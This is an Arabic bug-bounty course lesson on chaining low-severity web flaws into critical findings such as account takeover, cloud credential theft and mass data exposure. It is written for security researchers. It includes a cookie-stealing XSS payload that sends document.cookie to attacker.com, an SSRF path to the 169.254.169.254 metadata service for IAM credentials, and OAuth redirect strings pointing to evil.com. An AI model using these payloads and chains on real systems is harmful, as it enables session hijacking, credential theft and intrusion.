الدرس 20 من 24

أمان API والهاتف

تسلسل الثغرات لأقصى تأثير

3 دقيقة للقراءة

الثغرات الفردية منخفضة الخطورة يمكن أن تتجمع في اكتشافات حرجة. تسلسل الثغرات هو ما يفصل الصيادين الجيدين عن العظماء.

لماذا تسلسل الثغرات؟

ثغرة واحدة ثغرات متسلسلة
خطورة منخفضة-متوسطة خطورة حرجة
مكافأة 100-500 دولار مكافأة 5,000-50,000+ دولار
"معلوماتي" "اختراق كامل"
غالباً تُرفض دائماً تُرتب كأولوية

السلاسل الشائعة

XSS → استيلاء الحساب

1. ابحث عن stored XSS في ملف المستخدم
2. حقن حمولة لسرقة كوكيز الجلسة
3. الضحية يعرض الملف، الجلسة تُستخرج
4. المهاجم يستخدم الجلسة المسروقة
5. استيلاء كامل على الحساب

الحمولة:

<script>
fetch('https://attacker.com/steal?c='+document.cookie)
</script>

SSRF → بيانات السحابة الوصفية → استيلاء AWS

1. ابحث عن SSRF في ميزة جلب URL
2. الوصول لـ http://169.254.169.254/latest/meta-data/
3. استخراج بيانات اعتماد دور IAM
4. استخدام بيانات الاعتماد للوصول لموارد AWS
5. دلاء S3، مثيلات EC2 مخترقة

تصعيد التأثير:

  • SSRF وحده: متوسط
  • مع البيانات الوصفية: عالي
  • مع الوصول لبيانات الاعتماد: حرج

IDOR → كشف بيانات جماعي

1. ابحث عن IDOR يعيد سجلاً واحداً
2. عدد المعرفات لتفريغ جميع السجلات
3. سلسل مع SQLi أو التصفح غير الصحيح
4. استخراج قاعدة البيانات بأكملها
5. PII لجميع المستخدمين مكشوفة

إعادة توجيه مفتوحة → سرقة رمز OAuth

1. ابحث عن إعادة توجيه مفتوحة: /redirect?url=evil.com
2. استخدم في تدفق OAuth: /oauth?redirect_uri=/redirect?url=evil.com
3. الضحية يصرح للتطبيق
4. الرمز يُرسل لـ evil.com عبر إعادة التوجيه
5. الوصول للحساب

كشف معلومات → تجاوز تسجيل الدخول

1. ابحث عن نقطة نهاية debug مكشوفة ببريد المستخدمين
2. رموز إعادة تعيين كلمة المرور مسربة في السجلات
3. اربط البريد ← الرمز
4. أعد تعيين كلمة مرور أي مستخدم
5. حساب المدير مخترق

مثال سلسلة معقدة

سلسلة هجوم كاملة: ثغرة 100 دولار → حرجة 50,000 دولار

الخطوة 1: كشف معلومات منخفض الخطورة
- نقطة نهاية /debug مكشوفة تكشف IP داخلي

الخطوة 2: SSRF عبر إنشاء PDF
- /generate-pdf?url= يقبل URLs داخلية
- الوصول للشبكة الداخلية عبر IP المكشوف

الخطوة 3: وُجد Jenkins داخلي
- Jenkins على IP الداخلي بدون مصادقة
- يمكن تنفيذ أوامر عشوائية

الخطوة 4: الوصول لبيانات الاعتماد
- بيئة Jenkins لديها بيانات اعتماد AWS
- سلاسل اتصال قاعدة البيانات مكشوفة

الخطوة 5: اختراق كامل
- وصول AWS → دلاء S3 → بيانات العملاء
- وصول قاعدة البيانات → تفريغ كامل للبيانات

منهجية التسلسل

الخطوة 1: جرد جميع الاكتشافات

| المعرف | الثغرة | الخطورة | ملاحظات |
|--------|--------|---------|---------|
| 1 | إعادة توجيه مفتوحة | منخفضة | تدفق تسجيل الدخول |
| 2 | SSRF (أعمى) | متوسطة | مولد PDF |
| 3 | كشف معلومات | معلوماتي | أرقام الإصدارات |
| 4 | JWT ضعيف | متوسطة | لا تحقق من التوقيع |

الخطوة 2: ارسم الاتصالات المحتملة

إعادة توجيه مفتوحة → تدفق OAuth؟
SSRF → خدمات داخلية؟
كشف معلومات → إصدار → CVE معروف؟
JWT ضعيف → تزوير الرمز → وصول المدير؟

الخطوة 3: اختبر التركيبات

  • هل يمكن للثغرة أ تمكين الثغرة ب؟
  • هل يمكن لمخرج الثغرة ب التغذية للثغرة ج؟
  • ما أسوأ سيناريو إذا نجح كل شيء؟

الخطوة 4: وثق السلسلة

## سلسلة الثغرات: استيلاء الحساب عبر XSS + CSRF

### الثغرات الفردية
1. Stored XSS في bio الملف الشخصي (متوسطة)
2. لا حماية CSRF على تغيير البريد (متوسطة)

### سلسلة الهجوم
1. المهاجم يحقن حمولة XSS في ملفه الشخصي
2. الحمولة تُنفذ عندما يعرض الضحية الملف
3. XSS يُفعل تغيير البريد لبريد المهاجم
4. إعادة تعيين كلمة المرور تُرسل للمهاجم
5. استيلاء كامل على الحساب

### التأثير: حرج
- أي مستخدم يعرض ملف المهاجم يفقد حسابه

جدول مضاعفة التأثير

الثغرة 1 + الثغرة 2 = التأثير
SSRF وصول داخلي حرج
XSS سرقة جلسة عالي→حرج
SQLi وصول جدول المدير حرج
IDOR تعداد جماعي عالي
تسريب معلومات كشف بيانات الاعتماد حرج
إعادة توجيه مفتوحة OAuth عالي

أمثلة المكافآت

الشركة السلسلة المكافأة
Uber SSRF → AWS → بيانات 25,000 دولار
Shopify XSS → CSRF → ATO 15,000 دولار
PayPal IDOR → تسريب جماعي 12,000 دولار
GitLab معلومات → SQLi → RCE 35,000 دولار

نصائح احترافية

  1. لا تتجاهل الثغرات منخفضة الخطورة: إنها بداية السلاسل
  2. ارسم تدفق التطبيق: افهم كيف تتحرك البيانات
  3. فكر كمهاجم: ما أسوأ ما يمكنك فعله؟
  4. وثق كل شيء: السلاسل تحتاج سرديات واضحة
  5. أوصل التأثير: ساعد الفرز على فهم الخطورة

نصيحة احترافية: أفضل السلاسل تُروى كقصص. "المهاجم يفعل X، مما يمكّن Y، مؤدياً لاختراق Z." اجعل المسار للتأثير واضحاً تماماً.

الوحدة التالية: التقارير الاحترافية وبناء مسيرتك. :::

اختبار

الوحدة 5: أمان API والهاتف

خذ الاختبار